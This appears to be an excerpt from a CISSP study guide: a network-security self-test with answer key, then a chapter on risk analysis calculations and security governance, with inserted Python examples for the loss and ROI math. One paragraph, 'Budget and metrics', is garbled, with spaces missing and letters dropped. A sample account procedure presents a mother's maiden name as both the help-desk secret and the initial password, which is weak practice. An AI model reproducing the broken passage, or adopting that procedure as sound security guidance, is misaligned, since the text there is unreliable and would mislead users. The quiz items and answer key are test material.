Telecommunications and Network Security is a large and complex domain, requiring broad and sometimes deep understanding of thorny technical issues. Our modern world relies on networks, and those networks must be kept secure. It is important to understand not only why we use concepts like packet-switched networks and the OSI model but also how we implement those concepts.
Older Internet-connected networks often had a single dual-homed host connected to the Internet. Firewalls were created and then evolved from packet filter to stateful. Our physical design evolved from buses to stars, providing fault tolerance and hardware isolation. We have evolved from hubs to switches that provide traffic isolation. We have added detective devices such as HIDS and NIDS and preventive devices such as HIPS and NIPS. We have deployed secure protocols such as TLS and IPsec.
We have improved our network defense in depth every step of the way and increased the confidentiality, integrity, and availability of our network data.

TOP FIVE TOUGHEST QUESTIONS

1. Restricting Bluetooth device discovery relies on the secrecy of what?
A. MAC Address
B. Symmetric Key
C. Private Key
D. Public Key
2. Which endpoint security technique is the most likely to prevent a previously unknown attack from being successful?
A. Signature-based antivirus
B. Host Intrusion Detection Systems (HIDS)
C. Application whitelisting
D. Perimeter firewall
3. What is the most secure type of EAP?
A. EAP-TLS
B. EAP-TTLS
C. LEAP
D. PEAP
4. What is the most secure type of firewall?
A. Packet filter
B. Stateful firewall
C. Circuit-level Proxy firewall
D. Application-Layer Proxy firewall
5. Accessing an IPv6 network via an IPv4 network is called what?
A. CIDR
B. NAT
C. Translation
D. Tunneling

SELF-TEST QUICK ANSWER KEY

1. Correct answer and explanation: A. Answer A is correct; restricting Bluetooth device discovery relies on the secrecy of the 48-bit Bluetooth MAC address.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. While E0 is a symmetric cipher, it is not used to restrict discovery (it is used to encrypt data). Public or private keys are also not used for Bluetooth discovery.
2. Correct answer and explanation: C. Answer C is correct: application whitelisting is the most likely to be successful of the options listed.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are all incorrect. Signature-based antivirus is most successful at preventing known rather than unknown attacks. Host Intrusion Detection Systems (HIDS) do not prevent attacks from being successful, but rather can help detect them. A perimeter firewall is not an endpoint security product.
3. Correct answer and explanation: A. Answer A is correct; EAP-TLS is the most secure (and costly) form of EAP because it requires both server- and client-side certificates.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. EAP-TTLS and PEAP are similar and don't require client-side certificates. LEAP is a Cisco-proprietary protocol that does not require client-side certificates, and also has fundamental security weaknesses.
4. Correct answer and explanation: D. Answer D is correct; Application-Layer firewalls are the most secure: they have the ability to filter based on OSI layers three through seven.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. All are firewalls. A packet filter is the least secure of the four, due to the lack of state. A stateful firewall is more secure than a packet filter, but its decisions are limited to Layers 3 and 4. Circuit-level Proxy firewalls operate at Layer 5 and cannot filter based on Application-Layer data.
5. Correct answer and explanation: D. Answer D is correct; accessing an IPv6 network via an IPv4 network is called tunneling.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. CIDR is Classless Inter-Domain Routing, a way to create flexible subnets. NAT is Network Address Translation, which translates one IP address for another. Translation is a distracter answer.

CHAPTER 3

Domain 3: Information Security Governance and Risk Management

Abstract
This chapter presents a fundamental domain tested on the CISSP, Domain 3: Information Security Governance and Risk Management. Key terms, concepts, and formulas related to risk management are presented within this chapter. Risk, threat, and vulnerability are basic terms that must be understood to prove successful with this domain. Understanding how to perform calculations using Annualized Loss Expectancy (ALE), Single Loss Expectancy (SLE), Annualized Rate of Occurrence (ARO), and Exposure Factor (EF) is highlighted as part of quantitative risk analysis. Important concepts related to information security governance such as privacy, due care, due diligence, certification, and accreditation are also a focus of this chapter.

KEYWORDS
Threat; Vulnerability; Risk; Safeguard; Quantitative Risk Analysis; Qualitative Risk Analysis; Asset Value (AV); Exposure Factor (EF); Single Loss Expectancy (SLE); Annual Rate of Occurrence (ARO); Annualized Loss Expectancy (ALE); Total Cost of Ownership (TCO); Return on Investment (ROI); Policy; Procedure; Standard; Baseline; Guideline

Exam Objectives in This Chapter

Risk Analysis
Information Security Governance

Introduction

Our job as information security professionals is to evaluate risks against our critical assets and deploy safeguards to mitigate those risks. We work in various roles: firewall engineers, penetration testers, auditors, management, etc. The common thread is risk: it is part of our job description.
The Information Security Governance and Risk Management domain focuses on Risk Analysis and mitigation. This domain also details security governance, or the organizational structure required for a successful information security program. The difference between organizations that are successful versus those that fail in this realm is usually not tied to dollars or size of staff: it is tied to the right people in the right roles. Knowledgeable and experienced information security staff with supportive and vested leadership is the key to success.

RISK ANALYSIS

All information security professionals assess risk: we do it so often that it becomes second nature. Accurate Risk Analysis is a critical skill for an information security professional. We must hold ourselves to a higher standard when judging risk. Our risk decisions will dictate which safeguards we deploy to protect our assets and the amount of money and resources we spend doing so. Poor decisions will result in wasted money or, even worse, compromised data.

Assets

Assets are valuable resources you are trying to protect. Assets can be data, systems, people, buildings, property, and so forth. The value or criticality of the asset will dictate what safeguards you deploy.

Threats and vulnerabilities

A threat is anything that can potentially cause harm to an asset. Threats include earthquakes, power outages, or network-based worms.
A vulnerability is a weakness that allows a threat to cause harm. Examples of vulnerabilities (matching our previous threats) are buildings that are not built to withstand earthquakes, a data center without proper backup power, or a Microsoft Windows XP system that has not been patched in a few years.

Risk = Threat × Vulnerability

To have risk, a threat must connect to a vulnerability. This relationship is stated by the formula:

Risk = Threat × Vulnerability

You can assign a value to specific risks using this formula. Assign a number to both threats and vulnerabilities. We will use a range of 1-5 (the range is arbitrary; just keep it consistent when comparing different risks).

Impact

The risk = threat × vulnerability equation sometimes uses an added variable called impact: risk = threat × vulnerability × impact. Impact is the severity of the damage, sometimes expressed in dollars. Risk = threat × vulnerability × cost is sometimes used for that reason. A synonym for impact is consequences.

Exam Warning

Loss of human life has near-infinite impact on the exam. When calculating risk using the risk = threat × vulnerability × impact formula, any risk involving loss of human life is extremely high and must be mitigated.

Risk Analysis Matrix

The Risk Analysis Matrix uses a quadrant to map the likelihood of a risk occurring against the consequences (or impact) that risk would have. Australia/New Zealand ISO 31000:2009 Risk Management Principles and Guidelines (AS/NZS ISO 31000:2009, see http://infostore.saiglobal.com/store/Details.aspx?ProductID=1378670) describes the Risk Analysis Matrix, shown in Table 3.1.

Table 3.1
Risk Analysis Matrix

The Risk Analysis Matrix allows you to perform Qualitative Risk Analysis (see Section "Qualitative and Quantitative Risk Analysis") based on likelihood (from rare to almost certain) and consequences (or impact), from insignificant to catastrophic. The resulting scores are low (L), medium (M), high (H), and extreme risk (E). Low risks are handled via normal processes, moderate risks require management notification, high risks require senior management notification, and extreme risks require immediate action including a detailed mitigation plan (and senior management notification).
The goal of the matrix is to identify high likelihood/high consequence risks (upper right quadrant of Table 3.1) and drive them down to low likelihood/low consequence risks (lower left quadrant of Table 3.1).
Calculating Annualized Loss Expectancy

The Annualized Loss Expectancy (ALE) calculation allows you to determine the annual cost of a loss due to a risk. Once calculated, ALE allows you to make informed decisions to mitigate the risk.
This section will use an example of risk due to lost or stolen unencrypted laptops. Assume your company has 1000 laptops that contain Personally Identifiable Information (PII). You are the security officer, and you are concerned about the risk of exposure of PII due to lost or stolen laptops. You would like to purchase and deploy a laptop encryption solution. The solution is expensive, so you need to convince management that the solution is worthwhile.

Asset Value

The Asset Value (AV) is the value of the asset you are trying to protect. In this example, each laptop costs $2500, but the real value is the PII. Theft of unencrypted PII has occurred previously and has cost the company many times the value of the laptop in regulatory fines, bad publicity, legal fees, staff hours spent investigating, etc. The true average Asset Value of a laptop with PII for this example is $25,000 ($2500 for the hardware and $22,500 for the exposed PII).
Tangible assets (such as computers or buildings) are straightforward to calculate. Intangible assets are more challenging. For example, what is the value of brand loyalty? According to Deloitte, there are three methods for calculating the value of intangible assets, market approach, income approach, and cost approach:
Market Approach: This approach assumes that the fair value of an asset reflects the price at which comparable assets have been purchased in transactions under similar circumstances.
Income Approach: This approach is based on the premise that the value of a security or asset is the present value of the future earning capacity that an asset will generate over its remaining useful life.
Cost Approach: This approach estimates the fair value of the asset by reference to the costs that would be incurred in order to recreate or replace the asset.

Exposure Factor

The Exposure Factor (EF) is the percentage of an asset's value lost due to an incident. In the case of a stolen laptop with unencrypted PII, the Exposure Factor is 100%: the laptop and all the data are gone.

Single Loss Expectancy

The Single Loss Expectancy (SLE) is the cost of a single loss. SLE is the Asset Value (AV) times the Exposure Factor (EF). In our case, SLE is $25,000 (Asset Value) times 100% (Exposure Factor) or $25,000.

Annual Rate of Occurrence

The Annual Rate of Occurrence (ARO) is the number of losses you suffer per year. Looking through past events, you discover that you have suffered 11 lost or stolen laptops per year on average. Your ARO is 11.

Annualized Loss Expectancy

The Annualized Loss Expectancy (ALE) is your yearly cost due to a risk. It is calculated by multiplying the Single Loss Expectancy (SLE) times the Annual Rate of Occurrence (ARO). In our case, it is $25,000 (SLE) times 11 (ARO) or $275,000.
Table 3.2 summarizes the equations used to determine Annualized Loss Expectancy.

Table 3.2
Summary of Risk Equations

Total Cost of Ownership

The Total Cost of Ownership (TCO) is the total cost of a mitigating safeguard. TCO combines upfront costs (often a one-time capital expense) plus annual cost of maintenance, including staff hours, vendor maintenance fees, software subscriptions, etc. These ongoing costs are usually considered operational expenses.
Using our laptop encryption example, the upfront cost of laptop encryption software is $100/laptop, or $100,000 for 1000 laptops. The vendor charges a 10% annual support fee or $10,000/year. You estimate that it will take 4 staff hours per laptop to install the software or 4000 staff hours. The staff that will perform this work makes $50/hour plus benefits. Including benefits, the staff cost per hour is $70 times 4000 hours, that is, $280,000.
Your company uses a 3-year technology refresh cycle, so you calculate the Total Cost of Ownership over 3 years:
Software cost: $100,000
Three years vendor support: $10,000 × 3 = $30,000
Hourly staff cost: $280,000
Total Cost of Ownership over 3 years: $410,000
Total Cost of Ownership per year: $410,000/3 = $136,667/year
Your Annual Total Cost of Ownership for the laptop encryption project is $136,667 per year.

Return on Investment

The Return on Investment (ROI) is the amount of money saved by implementing a safeguard. If your annual Total Cost of Ownership (TCO) is less than your Annualized Loss Expectancy (ALE), you have a positive ROI (and have made a good choice). If the TCO is higher than your ALE, you have made a poor choice.
The annual TCO of laptop encryption is $136,667; the Annualized Loss Expectancy for lost or stolen unencrypted laptops is $275,000. The math is summarized in Table 3.3.

Table 3.3
Annualized Loss Expectancy of Unencrypted Laptops

Implementing laptop encryption will change the Exposure Factor. The laptop hardware is worth $2500, and the exposed PII costs an additional $22,500 for $25,000 Asset Value. If an unencrypted laptop is lost or stolen, the Exposure Factor is 100% (the hardware and all data is exposed). Laptop encryption mitigates the PII exposure risk, lowering the Exposure Factor from 100% (the laptop and all data) to 10% (just the laptop hardware).
The lower Exposure Factor lowers the Annualized Loss Expectancy from $275,000 to $27,500 as shown in Table 3.4.

Table 3.4
Annualized Loss Expectancy of Encrypted Laptops

You will save $247,500/year (the old ALE, $275,000, minus the new ALE, $27,500) by making an investment of $136,667. Your ROI is $110,833 per year ($247,500 minus $136,667). The laptop encryption project has a positive ROI and is a wise investment.
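The SLE, ALE, TCO and ROI chain above carried through in Python as an added example (not code from the book), using the chapter's laptop figures as input so the same $275,000, $136,667 and $110,833 fall out; the Risk and Safeguard classes are this example's own structure, not a standard from the exam.

```python
from dataclasses import dataclass


@dataclass
class Risk:
    asset_value: float        # AV, in dollars
    exposure_factor: float    # EF, fraction of AV lost per incident (0..1)
    annual_rate: float        # ARO, incidents per year

    @property
    def sle(self) -> float:
        """Single Loss Expectancy = AV x EF."""
        return self.asset_value * self.exposure_factor

    @property
    def ale(self) -> float:
        """Annualized Loss Expectancy = SLE x ARO."""
        return self.sle * self.annual_rate


@dataclass
class Safeguard:
    upfront_cost: float            # one-time capital expense (software)
    annual_costs: tuple            # recurring operational costs per year
    lifetime_years: int            # refresh cycle the cost is spread over
    one_time_labor: float = 0.0    # e.g. installation staff hours

    @property
    def tco(self) -> float:
        """Total Cost of Ownership over the whole lifetime."""
        return (self.upfront_cost + self.one_time_labor
                + sum(self.annual_costs) * self.lifetime_years)

    @property
    def annual_tco(self) -> float:
        return self.tco / self.lifetime_years


def return_on_investment(before: Risk, after: Risk, safeguard: Safeguard) -> float:
    """ROI per year = (ALE before - ALE after) - annual TCO.
    Positive means the safeguard saves more than it costs."""
    return (before.ale - after.ale) - safeguard.annual_tco


def laptop_encryption_case() -> dict:
    """The chapter's scenario: 1000 laptops at AV $25,000, ARO 11, encryption
    lowers EF from 100% to 10%; TCO is spread over a 3-year refresh cycle."""
    laptops = 1000
    unencrypted = Risk(asset_value=25_000, exposure_factor=1.0, annual_rate=11)
    encrypted = Risk(asset_value=25_000, exposure_factor=0.10, annual_rate=11)
    software = 100 * laptops                      # $100 per laptop
    encryption = Safeguard(
        upfront_cost=software,
        annual_costs=(0.10 * software,),           # 10% vendor support per year
        lifetime_years=3,
        one_time_labor=4 * laptops * 70,           # 4 h/laptop at $70/h loaded
    )
    return {
        "sle": unencrypted.sle,
        "ale_before": unencrypted.ale,
        "ale_after": encrypted.ale,
        "tco_3yr": encryption.tco,
        "annual_tco": encryption.annual_tco,
        "roi_per_year": return_on_investment(unencrypted, encrypted, encryption),
    }


if __name__ == "__main__":
    for name, value in laptop_encryption_case().items():
        print(f"{name:>12}: ${value:,.0f}")
```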
Budget and metrics

WhencombinedwithRiskAnalysis,theTotalCostofOwnershipandReturn
onInvestmentcalculationsfactorintoproperbudgeting.Someorganizations
havetheenviablepositionofampleinformationsecurityfunding,yettheyare
oftencompromised.Why?Theanswerisusuallybecausetheymitigatedthe
wrongrisks.Theyspentmoneywhereitmaynothavebeennecessaryand
ignoredlargerrisks.Regardlessofstasizeorbudget,allorganizationscan
takeonaniteamountofinformationsecurityprojects.Iftheychoose
unwisely,informationsecuritycansuer.
Metricscangreatlyassisttheinformationsecuritybudgetingprocess.They
helpillustratepotentiallycostlyrisksanddemonstratetheeectiveness(and
potentialcostsavings)ofexistingcontrols.Theycanalsohelpchampionthe
causeofinformationsecurity.
Risk choices

Once we have assessed risk, we must decide what to do. Options include accepting the risk, mitigating or eliminating the risk, transferring the risk, and avoiding the risk.
Accept the risk

Some risks may be accepted: in some cases, it is cheaper to leave an asset unprotected due to a specific risk, rather than make the effort (and spend the money) required to protect it. This cannot be an ignorant decision: the risk must be considered, and all options must be considered before accepting the risk.
Risk acceptance criteria

Low likelihood/low consequence risks are candidates for risk acceptance. High and extreme risks cannot be accepted. There are cases, such as data protected by laws or regulations or risk to human life or safety, where accepting the risk is not an option.
Mitigate the risk

Mitigating the risk means lowering the risk to an acceptable level. The laptop encryption example given in the Annualized Loss Expectancy section is an example of mitigating the risk. The risk of lost PII due to stolen laptops was mitigated by encrypting the data on the laptops. The risk has not been eliminated entirely: a weak or exposed encryption password could expose the PII, but the risk has been reduced to an acceptable level.
In some cases, it is possible to remove the risk entirely: this is called eliminating the risk.
Transfer the risk

Transfer the risk is the insurance model. Most people do not assume the risk of fire to their house: they pay an insurance company to assume that risk for them. The insurance companies are experts in Risk Analysis: buying risk is their business.
Risk avoidance

A thorough Risk Analysis should be completed before taking on a new project. If the Risk Analysis discovers high or extreme risks that cannot be easily mitigated, avoiding the risk (and the project) may be the best option.
Qualitative and Quantitative Risk Analysis

Quantitative and Qualitative Risk Analyses are two methods for analyzing risk. Quantitative Risk Analysis uses hard metrics, such as dollars. Qualitative Risk Analysis uses simple approximate values. Quantitative is more objective; qualitative is more subjective. Hybrid Risk Analysis combines the two: using quantitative analysis for risks that may be easily expressed in hard numbers, such as money, and qualitative for the remainder.
Calculating the Annualized Loss Expectancy (ALE) is an example of Quantitative Risk Analysis. The Risk Analysis Matrix (shown previously in Table 3.1) is an example of Qualitative Risk Analysis.
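The risk choices and the qualitative/quantitative/hybrid distinction, tied together in one added Python example (not the study guide's own code). The three likelihood and consequence levels, the matrix that maps them to a rating, and the dollar thresholds that translate an ALE into the same ratings are assumptions for illustration; the guide's Table 3.1 is not reproduced in this section. The decision rules follow the text: low likelihood/low consequence risks are acceptance candidates, high and extreme risks are never accepted, regulated data or risk to life or safety rules acceptance out, and a high or extreme risk that cannot be mitigated is avoided.

```python
"""Qualitative risk rating, hybrid analysis and risk-choice rules.

Added example, not from the study guide. Levels, matrix and ALE thresholds
are assumed; the decision rules follow the text.
"""
from dataclasses import dataclass
from enum import IntEnum
from typing import Optional


class Level(IntEnum):
    LOW = 1
    MEDIUM = 2
    HIGH = 3


# Assumed qualitative matrix: (likelihood, consequence) -> rating.
MATRIX = {
    (Level.LOW, Level.LOW): "low",          (Level.LOW, Level.MEDIUM): "low",
    (Level.LOW, Level.HIGH): "medium",      (Level.MEDIUM, Level.LOW): "low",
    (Level.MEDIUM, Level.MEDIUM): "medium", (Level.MEDIUM, Level.HIGH): "high",
    (Level.HIGH, Level.LOW): "medium",      (Level.HIGH, Level.MEDIUM): "high",
    (Level.HIGH, Level.HIGH): "extreme",
}

# Assumed thresholds for the quantitative side of a hybrid analysis (ALE, dollars).
ALE_THRESHOLDS = [(250_000, "extreme"), (100_000, "high"), (50_000, "medium")]


@dataclass
class Risk:
    name: str
    likelihood: Level
    consequence: Level
    ale: Optional[float] = None      # set when the loss can be expressed in dollars
    regulated_data: bool = False     # e.g. PII protected by law or regulation
    safety_risk: bool = False        # risk to human life or safety
    mitigation_feasible: bool = True


def qualitative_rating(likelihood: Level, consequence: Level) -> str:
    """Look the pair up in the risk matrix."""
    return MATRIX[(likelihood, consequence)]


def quantitative_rating(ale: float) -> str:
    """Map a dollar ALE onto the same rating scale (assumed thresholds)."""
    for threshold, rating in ALE_THRESHOLDS:
        if ale >= threshold:
            return rating
    return "low"


def hybrid_rating(risk: Risk) -> str:
    """Hybrid analysis: hard numbers where we have them, the matrix otherwise."""
    if risk.ale is not None:
        return quantitative_rating(risk.ale)
    return qualitative_rating(risk.likelihood, risk.consequence)


def risk_choice(risk: Risk) -> str:
    """Accept, mitigate, transfer or avoid, per the acceptance criteria in the text."""
    rating = hybrid_rating(risk)
    if rating in ("high", "extreme"):
        return "mitigate" if risk.mitigation_feasible else "avoid"
    if risk.regulated_data or risk.safety_risk:
        return "mitigate"                 # acceptance is not an option here
    if rating == "low":
        return "accept"
    return "mitigate or transfer"         # medium: reduce it, or insure against it


# Constructed risk register for a walk-through (first two use the text's ALE figures).
REGISTER = [
    Risk("stolen unencrypted laptop with PII", Level.HIGH, Level.HIGH,
         ale=275_000, regulated_data=True),
    Risk("stolen encrypted laptop", Level.HIGH, Level.LOW, ale=27_500),
    Risk("lobby whiteboard photographed by visitor", Level.LOW, Level.LOW),
    Risk("new plant sited on a flood plain", Level.HIGH, Level.HIGH,
         safety_risk=True, mitigation_feasible=False),
]

if __name__ == "__main__":
    for r in REGISTER:
        print(f"{r.name:45} {hybrid_rating(r):8} -> {risk_choice(r)}")
```

With the assumed thresholds the unencrypted laptop rates "extreme" and must be mitigated, while the encrypted laptop's $27,500 ALE falls to "low" and becomes an acceptance candidate, which is the residual-risk outcome the text describes.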
The Risk Management process

The U.S. National Institute of Standards and Technology (NIST) published Special Publication 800-30, Risk Management Guide for Information Technology Systems (see http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf). The guide describes a 9-step Risk Analysis process:
1. System Characterization
2. Threat Identification
3. Vulnerability Identification
4. Control Analysis
5. Likelihood Determination
6. Impact Analysis
7. Risk Determination
8. Control Recommendations
9. Results Documentation

INFORMATION SECURITY GOVERNANCE

Information Security Governance is information security at the organizational level: senior management, policies, processes, and staffing. It is also the organizational priority provided by senior leadership, which is required for a successful information security program.
Security policy and related documents

Documents such as policies and procedures are a required part of any successful information security program. These documents should be grounded in reality: they are not idealistic documents that sit on shelves collecting dust. They should mirror the real world and provide guidance on the correct (and sometimes required) way of doing things.
Policy

Policies are high-level management directives. Policy is mandatory: if you do not agree with your company's sexual harassment policy, for example, you do not have the option of not following it.

Crunch Time
Policy is high level: it does not delve into specifics. A server security policy would discuss protecting the confidentiality, integrity, and availability of the system (usually in those terms). It may discuss software updates and patching. The policy would not use terms like "Linux" or "Windows"; that is too low level. In fact, if you converted your servers from Windows to Linux, your server policy would not change. Other documents, like procedures, would change.

Components of program policy

All policy should contain these basic components:
Purpose
Scope
Responsibilities
Compliance

Purpose describes the need for the policy, typically to protect the confidentiality, integrity, and availability of protected data.
Scope describes what systems, people, facilities, and organizations are covered by the policy. Any related entities that are not in scope should be documented to avoid confusion.
Responsibilities include responsibilities of information security staff, policy and management teams, as well as responsibilities of all members of the organization.
Compliance describes two related issues: how to judge the effectiveness of the policies (how well they are working) and what happens when policy is violated (the sanction). All policy must have "teeth": a policy that forbids accessing explicit content via the Internet is not useful if there are no consequences for doing so.
Policy types

NIST Special Publication 800-12 (see http://csrc.nist.gov/publications/nistpubs/800-12/800-12-html/chapter5.html) discusses three specific policy types: program policy, issue-specific policy, and system-specific policy.
Program policy establishes an organization's information security program. Examples of issue-specific policies listed in NIST SP 800-12 include email policy and email privacy policy. Examples of system-specific policies include a file server policy or a Web server policy.
Procedures

A procedure is a step-by-step guide for accomplishing a task. They are low level and specific. Like policies, procedures are mandatory.
Here is a simple example procedure for creating a new user:
1. Receive a new user request form and verify its completeness.
2. Verify that the user's manager has signed the form.
3. Verify that the user has read and agreed to the user account security policy.
4. Classify the user's role by following role assignment procedure NX103.
5. Verify that the user has selected a secret word, such as their mother's maiden name, and enter it into the help desk account profile.
6. Create the account and assign the proper role.
7. Assign the secret word as the initial password and set "Force user to change password on next login" to "True."
8. Email the "New Account" document to the user and their manager.
The steps of this procedure are mandatory. Security administrators do not have the option of skipping step 1, for example, and creating an account without a form.

Did You Know?
Other safeguards depend on this fact: when a user calls the help desk as a result of a forgotten password, the help desk will follow their forgotten password procedure, which includes asking for the user's secret word. They cannot do that unless step 5 was completed: without that word, the help desk cannot securely reset the password. This mitigates social engineering attacks, where an imposter tries to trick the help desk into resetting a password for an account they are not authorized to access.

Standards

A standard describes the specific use of technology, often applied to hardware and software. "All employees will receive an ACME Nexus 6 laptop with 4 gigabytes of memory, a 2.8 GHz dual-core CPU, and 2 Terabyte disk" is an example of a hardware standard. "The laptops will run Windows 8 Enterprise, 64-bit version" is an example of a software (operating system) standard.
Standards are mandatory. They lower the Total Cost of Ownership of a safeguard.
Guidelines

Guidelines are recommendations (which are discretionary). A guideline can be a useful piece of advice, such as "To create a strong password, take the first letter of every word in a sentence, and mix in some numbers and symbols. 'I will pass the CISSP exam in 6 months!' becomes 'Iwptcei6m!'"
You can create a strong password without following this advice, which is why guidelines are not mandatory. They are useful, especially for novice users.
Baselines

Baselines are uniform ways of implementing a safeguard. "Harden the system by applying the Center for Internet Security Linux benchmarks" is an example of a baseline (see http://benchmarks.cisecurity.org for the CIS Security Benchmarks; they are a great resource). The system must meet the baseline described by those benchmarks.
Baselines are discretionary: it is acceptable to harden the system without following the aforementioned benchmarks, as long as it is at least as secure as a system hardened using the benchmarks.
Table 3.5 summarizes the types of security documentation.
Table 3.5
Summary of Security Documentation

Roles and responsibilities

Primary information security roles include senior management, data owner, custodian, and user. Each plays a different role in securing an organization's assets.
Senior management creates the information security program and ensures that it is properly staffed and funded and has organizational priority. It is responsible for ensuring that all organizational assets are protected.
The data owner (also called information owner or business owner) is a management employee responsible for ensuring that specific data is protected. Data owners determine data sensitivity labels and the frequency of data backup. A company with multiple lines of business may have multiple data owners. The data owner performs management duties; custodians perform the hands-on protection of data.
A custodian provides hands-on protection of assets such as data. They perform data backups and restoration, patch systems, configure antivirus software, etc. The custodians follow detailed orders; they do not make critical decisions on how data is protected. The data owner may dictate "All data must be backed up every 24 hours." The custodians (and their managers) would then deploy and operate a backup solution that meets the data owner's requirements.
The user is the fourth primary information security role. Users must follow the rules: they must comply with mandatory policies, procedures, standards, etc. They must not write their passwords down or share accounts, for example. Users must be made aware of these risks and requirements. You cannot assume they will know what to do or assume they are already doing the right thing: they must be told, via information security awareness.
Personnel security

Users can pose the biggest security risk to an organization. Background checks should be performed, contractors need to be securely managed, and users must be properly trained and made aware of security risks, as we will discuss next. Controls such as Nondisclosure Agreements (NDA) and related employment agreements are a recommended personnel security control.
Background checks

Organizations should conduct a thorough background check before hiring anyone. A criminal records check should be conducted, and all experience, education, and certifications should be verified. Lying or exaggerating about education, certifications, and related credentials is one of the most common examples of dishonesty in regards to the hiring process.
More thorough background checks should be conducted for roles with heightened privileges, such as access to money or classified information. These checks can include a financial investigation, a more thorough criminal records check, and interviews with friends, neighbors, and current and former coworkers.
Employee termination

Termination should result in immediate revocation of all employee access. Beyond account revocation, termination should be a fair process. There are ethical and legal reasons for employing fair termination, but there is also an additional information security advantage. An organization's worst enemy can be a disgruntled former employee, who, even without legitimate account access, knows where the weak spots are.
Security awareness and training

Security awareness and training are often confused. Awareness changes user behavior; training provides a skill set.
Reminding users to never share accounts or write their passwords down is an example of awareness. It is assumed that some users are doing the wrong thing, and awareness is designed to change that behavior.
Security training teaches a user how to do something. Examples include training new help desk personnel to open, modify, and close service tickets; training network engineers to configure a router; or training a security administrator to create a new account.
Vendor, consultant, and contractor security

Vendors, consultants, and contractors can introduce risks to an organization. They are not direct employees and sometimes have access to systems at multiple organizations. If allowed to, they may place an organization's sensitive data on devices not controlled (or secured) by the organization.
Third-party personnel with access to sensitive data must be trained and made aware of risks, just as employees are. Background checks may also be required, depending on the level of access required. Information security policies, procedures, and other guidance should apply as well. Additional policies regarding ownership of data and intellectual property should be developed. Clear rules dictating where and when a third party may access or store data must be developed.
Outsourcing and offshoring

Outsourcing is the use of a third party to provide information technology support services that were previously performed in-house. Offshoring is outsourcing to another country.
Both can lower Total Cost of Ownership by providing IT services at lower cost. They may also enhance the information technology resources and skill set available to a company (especially a small company), which can improve confidentiality, integrity, and availability of data.
A thorough and accurate Risk Analysis must be performed before outsourcing or offshoring sensitive data. If the data will reside in another country, you must ensure that laws and regulations governing the data are followed, even beyond their jurisdiction.
Privacy

Privacy is the protection of the confidentiality of personal information. Many organizations host personal information about their users: PII such as social security numbers, financial information such as annual salary and bank account information required for payroll deposits, and health care information for insurance purposes. The confidentiality of this information must be assured.
Due care and due diligence

Due care is doing what a reasonable person would do. It is sometimes called the "prudent man" rule. The term derives from "duty of care": parents have a duty to care for their children, for example. Due diligence is the management of due care.
Due care and due diligence are often confused: they are related, but different. Due care is informal; due diligence follows a process. Think of due diligence as a step beyond due care. Expecting your staff to keep their systems patched means you expect them to exercise due care. Verifying that your staff has patched their systems is an example of due diligence.
Gross negligence

Gross negligence is the opposite of due care. It is a legally important concept. If you suffer loss of PII, but can demonstrate due care in protecting the PII, you are on legally stronger ground, for example. If you cannot demonstrate due care (you were grossly negligent), you are in a much worse legal position.
Best practice

Information security best practice is a consensus of the best way to protect the confidentiality, integrity, and availability of assets. Following best practices is a way to demonstrate due care and due diligence.
Auditing and control frameworks

Auditing means verifying compliance to a security control framework, published specification, or internal policies, standards, etc. Auditing helps support Risk Analysis efforts by verifying that a company not only "talks the talk" (has documentation supporting a robust information security program) but also "walks the walk" (actually has a robust information security program in practice).
A number of control frameworks are available to assist auditing Risk Analysis. Some, such as PCI-DSS, are industry specific. Others, such as OCTAVE, ISO 17799/27002, and COBIT, covered next, are more general.
OCTAVE

OCTAVE stands for Operationally Critical Threat, Asset, and Vulnerability Evaluation, a Risk Management framework from Carnegie Mellon University. OCTAVE describes a three-phase process for managing risk. Phase 1 identifies staff knowledge, assets, and threats. Phase 2 identifies vulnerabilities and evaluates safeguards. Phase 3 conducts the Risk Analysis and develops the risk mitigation strategy.
OCTAVE is a high-quality free resource that may be downloaded from http://www.cert.org/octave/.
ISO 17799 and the ISO 27000 series

ISO 17799 was a broad-based approach for information security code of practice by the International Organization for Standardization (based in Geneva, Switzerland). The full title is "ISO/IEC 17799:2005 Information technology - Security Techniques - Code of Practice for Information Security Management." ISO 17799:2005 signifies the 2005 version of the standard. It was based on BS (British Standard) 7799 Part 1.

Fast Facts
ISO 17799 had 11 areas, focusing on specific information security controls:[2]
1. Policy
2. Organization of information security
3. Asset management
4. Human resources security
5. Physical and environmental security
6. Communications and operations management
7. Access control
8. Information systems acquisition, development, and maintenance
9. Information security incident management
10. Business continuity management
11. Compliance

[2] ISO/IEC 17799:2005. http://www.iso.org/iso/catalogue_detail?csnumber=39612 [accessed June 26, 2013].

ISO 17799 was renumbered to ISO 27002 in 2005 to make it consistent with the 27000 series of ISO security standards. ISO 27001 is a related standard, formally called "ISO/IEC 27001:2005 Information technology - Security techniques - Information Security Management Systems - Requirements." ISO 27001 was based on BS 7799 Part 2.
Note that the title of ISO 27002 includes the word "techniques"; ISO 27001 includes the word "requirements." Simply put, ISO 27002 describes information security best practices (Techniques), and ISO 27001 describes a process for auditing (Requirements).
COBIT

COBIT (Control Objectives for Information and related Technology) is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association, see http://www.isaca.org).
ITIL

ITIL (Information Technology Infrastructure Library) is a framework for providing best services in IT Service Management (ITSM). More information about ITIL is available at http://www.itil-officialsite.com.
ITIL contains five Service Management Practices - Core Guidance publications:
Service Strategy
Service Design
Service Transition
Service Operation
Continual Service Improvement
Service Strategy helps IT provide services. Service Design details the infrastructure and architecture required to deliver IT services. Service Transition describes taking new projects and making them operational. Service Operation covers IT operations controls. Finally, Continual Service Improvement describes ways to improve existing IT services.
Certification and Accreditation

Certification is a detailed inspection that verifies whether a system meets the documented security requirements. Accreditation is the data owner's acceptance of the risk represented by that system. This process is called Certification and Accreditation or C&A.
NIST Special Publication 800-37 "Guide for the Security Certification and Accreditation of Federal Information Systems" (see http://csrc.nist.gov/publications/nistpubs/800-37-rev1/sp800-37-rev1-final.pdf) describes U.S. Federal Certification and Accreditation.
Certification may be performed by a trusted third party such as an auditor. Certifiers investigate a system, inspect documentation, and may observe operations. They audit the system to ensure compliance. Certification is only a recommendation: the certifier does not have the ability to approve a system or environment. Only the data owner (the accreditor) can do so.
NIST SP 800-37 describes a four-step Certification and Accreditation process:
Initiation phase
Security certification phase
Security accreditation phase
Continuous monitoring phase
